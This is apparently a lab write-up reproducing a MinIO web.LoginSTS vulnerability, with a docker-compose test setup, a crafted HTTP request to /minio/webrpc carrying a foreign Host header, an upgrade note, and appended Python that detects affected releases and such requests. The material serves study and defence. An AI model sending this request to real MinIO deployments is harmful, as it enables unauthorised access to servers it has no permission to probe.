Introduction
MinIO is an object storage server released under the Apache License v2.0. It is compatible with the Amazon S3 cloud storage API and is suited to storing large volumes of unstructured data (images, videos, log files, backups, container and VM images, and so on). As an open-source object store that can be deployed in a private cloud, MinIO is widely used worldwide.
Affected versions
MinIO < RELEASE.2021-01-30T00-20-58Z
Environment setup
The lab environment is installed with Docker.
docker-compose.yml
version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
Start the environment with docker-compose up -d

After starting, wait a while, roughly a minute.
Then visit http://your-ip:9000/minio/login and the login page should appear.

Vulnerability reproduction
Construct the following request and send it:
POST /minio/webrpc HTTP/1.1
Host: 192.168.204.131:666
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 74

{"id":1,"jsonrpc":"2.0","params":{"token":"test"},"method":"web.LoginSTS"}

Remediation
Upgrade to a fixed version.
https://github.com/minio/minio
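Two defender-side checks built from what this page states, as an added example that is not part of the original writeup or of the MinIO project: whether an image tag predates the fixed release named under "Affected versions", and whether a request to /minio/webrpc is a web.LoginSTS call whose Host header is not one of the deployment's own listeners (the fixed release validates that header, so on an older build such a request is what to alert on). The sample request is constructed from the shape shown above and the allowed host name is an assumption.

```python
import json
import re
from datetime import datetime

# Fixed build named under "Affected versions"; anything older is affected.
FIXED_RELEASE = "RELEASE.2021-01-30T00-20-58Z"
_RELEASE_RE = re.compile(r"RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z")


def parse_release(tag):
    """Turn a MinIO release tag (or an image tag containing one) into a datetime."""
    m = _RELEASE_RE.search(tag)
    if not m:
        raise ValueError("not a MinIO release tag: %r" % tag)
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S")


def is_vulnerable_release(tag):
    """True when the build predates the fixed release."""
    return parse_release(tag) < parse_release(FIXED_RELEASE)


def flag_loginsts(raw_request, allowed_hosts):
    """Return a finding for a web.LoginSTS call to /minio/webrpc whose Host
    header is not one of allowed_hosts (the listeners you actually serve);
    None for anything else. raw_request is headers, a blank line, then body."""
    head, _, body = raw_request.partition("\n\n")
    lines = head.splitlines()
    if not lines or not lines[0].startswith("POST /minio/webrpc"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    try:
        rpc = json.loads(body)
    except json.JSONDecodeError:
        return None
    if rpc.get("method") != "web.LoginSTS":
        return None
    host = headers.get("host", "")
    if host in allowed_hosts:
        return None
    params = rpc.get("params") if isinstance(rpc.get("params"), dict) else {}
    return {"host": host, "token": params.get("token")}


# Constructed sample with the request shape shown above (not captured traffic).
SAMPLE = ("POST /minio/webrpc HTTP/1.1\nHost: 192.168.204.131:666\n"
          "Content-Type: application/json\n\n"
          '{"id":1,"jsonrpc":"2.0","params":{"token":"test"},"method":"web.LoginSTS"}')
```

The lab image tag from the docker-compose file above evaluates as vulnerable, and the sample request is flagged unless "192.168.204.131:666" is in the allowed-host set.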